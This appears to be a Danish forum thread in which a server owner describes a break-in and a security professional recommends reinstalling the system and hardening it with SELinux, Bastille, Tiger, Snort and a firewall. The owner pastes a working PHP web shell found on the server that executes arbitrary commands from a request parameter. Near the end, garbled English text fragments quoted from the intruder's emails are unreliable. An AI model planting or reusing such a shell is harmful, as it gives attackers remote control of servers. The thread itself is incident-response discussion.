Er jeg blevet HACKET?

Det lyder som om du er blevet hacket, hvis den slags filer dukker op ad det blå uden du ved hvordan de er kommet der.

Du gør følgende.

1. Start med at tage forbindelsen fra nettet.
2. Herefter formaterer du serveren.
3. Så geninstallerer du styresystem og programmer fra bunden. Ikke noget med restår fra backup, for du ved ikke hvornår hackeren kompromittered dig. Installation sker fra sikrede medier.
4. Herefter fuld patching af af alle applikationer
5. Overvej at anvende SELinux som er en særlig sikret kernel du kan implementerer
6. Overvej at køre Bastille, som er et script der sikre maskiner.
7. kik på Tiger scriptet derer en slags baseline analyser til linux
8. Kik forbi http://ww.nsa,gov (vor du også herter SELINUX) og brug deres guides til hardening af din apache
9. Geninstaller dine web sites. og sikre dem ordentligt. jeg har skrevet en artikel om bl. sikker web kodning
10. Tag en firewall i brug, f.eks. ne netfilter box mellem din web server og din router
11. Overvej at anvende IDS, f.eks. snort derer gratis.

Glem alt om at undersøge maskinen, hvis han er noget værd, så har han slettet sine spor og gemt resten

læs denne

http://www.eksperten.dk/artikler/908

hvis det mod forventning er en windows server, så må di lige skrive ind, så er det lidt andre programmer og scripts du skal anvende, men princippet er det samme

Ok, jeg finder en ny linux - kigger på SElinux.
MEN hvordan i H.... kan man smide sine filer der???

Det er det letteste i verden hvis man kender de rigtige værktøjer. Hvis du ikke har IDS systemer kørende, ikke patcher dine systemer, ikke selv sårbarhedsanalyserer dine systemer, så er det en smal sag at lave den slags.

Hvis jeg skal demonstrerer så bliver det på sikrede net og ikke over internettet og så er du nødt til at kikke forbi frederiksberg

Hvad gør snort, sådan helt præcist?
Tiger script?

Denne var også lagt ind: shell.php

<? $cmd=$_REQUEST["-cmd"];\
?><html><head><title>Donalds php shell</title></head><body bgcolor=#000000 text=#ffffff\
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT \
name="-cmd" size=64 value="<?=$cmd?>" style=background:#000000;color:#ffffff;"><hr><pre><?\
if($cmd !="") print Shell_Exec($cmd);?></pre></form></body></html>

Det er udover omtalte scripts:
Derudover kan jeg via ssh-loggen se at det er kopieret nogle backupfiler i /...
Hvad kan denne hacker have interesse i?

Snort er et intrusion Detection Systen, der advare dig når der sker noget der ikke bør. Lige som et antivirus system, skal den kunne kende det der sker. Snort kan fange det meste

Tiger er et analyse script, der kan fortælle dig om din linux boks kan sikres bedre , lidt det asmme som MBSA til Windows

SSH har en del huller, dertraditionelt er blevet benyttet af hackerene til at komme ind, så det er måske der han er kommet ind. En gennemgribende analyse kræver en kopi af loggen og at han ikke har rettet i loggen

Han kan være interesseret i mange ting, Fil opbevaringsplads, et springbrædt til videre udfoldelser m.m.. Det har jeg også skrevet en artikel om. læs her, jeg har skrevet de fleste

http://www.eksperten.dk/artikler/Sikkerhed/

Min secure_log er blevet slettet med alt før i dag???

Arbejder du med sikkerhed til daglig?

Ja,

Arbejder med (i forsvaret), underviser i (hos http://www.protego.dk/ og http://www.pwc.dk/ der i dag er det samme firma)  og er certificeret CPSA og GCFW.
Flere certificeringer følger snart

hvis loggen er slettet er det meget vandskeligt, men da ikke umuligt

Men hvis man ligger et ftp-program op er det vel for at hente filer og/eller uploade filer. Jeg har 2 servere - denne hvor mail og webserver kører fra og den anden som databaser kører fra. Jeg tror ikke at denne er rørt.
Anbefaler du at web og mail hostes ude eller kan de ligeså hostes af os selv?
Men her det en redhat 7.3 og en fedora 2. Har en freebsd som web/mail backup.

Nu får jeg direkte trusler på min e-mail, om at de vil hacke min server - jeg kan så kontakte dem pr. e-mail. Hvad er mit træk, da serveren skal køre? Men sikkerhed kommer selvfølgelig i første række.
Jeg har lidt i tankerne at kontakte politiet.

Du bør kontakte politiet og se at få den maskine hardnet.

FTP servere bruges normalt af folk der ønsker at dele filer og andet skidt, selvom det dog ser ud som om der her er tale om et afpredsnings forsøg.

Mht at udbyde mail serveren, så er det en option mange vælger, så sikkerheden håndteres af andre. Derer så andre begrændsninger som du lige skal overveje før du endeligt beslutterd dig

Jeg har skrevet en e-mail til politiet, men jeg forventer ikke at de vil tage sig af det. Webhoteller er vel ligeså sårbare?
Jeg vil når jeg kører hjem i dag, sætte en windowsmaskine op til at agere webserver i weekenden, mens jeg reformaterer den ramte maskine.

Jeg har ikke nogen plan fr hvad jeg skal gøre i en sådan situation.

Vedkommende skriver dette i e-mails, hvis log også er slettet fra serveren.
Har lidt svært ved at se sammenhængen.

his portrait for us, and it will continue to live, as aster akel ( unch),
our anish hespis, will continue to live. he play and

already on land, and just at

a man in openhagen, the merchant erger, should be his guardian, since the
preacher did not wish to undertake the office. osalie was not forgotten
her devotion and fidelity had won for her a relative s right. er last days
should be free from care

with talents so

haughnessy says so. e was in yisterdah an says he is time we done
something to make th immigration laws sthronger, says

in the moon, which supposes this to be a man whom the ord has sent up
there because he

and drove away to yborg, the nearest town

had ruled, and apoleon s

ok, mange tak for hjælpen.
Jeg er ved at smide en bsd ind i stedet for.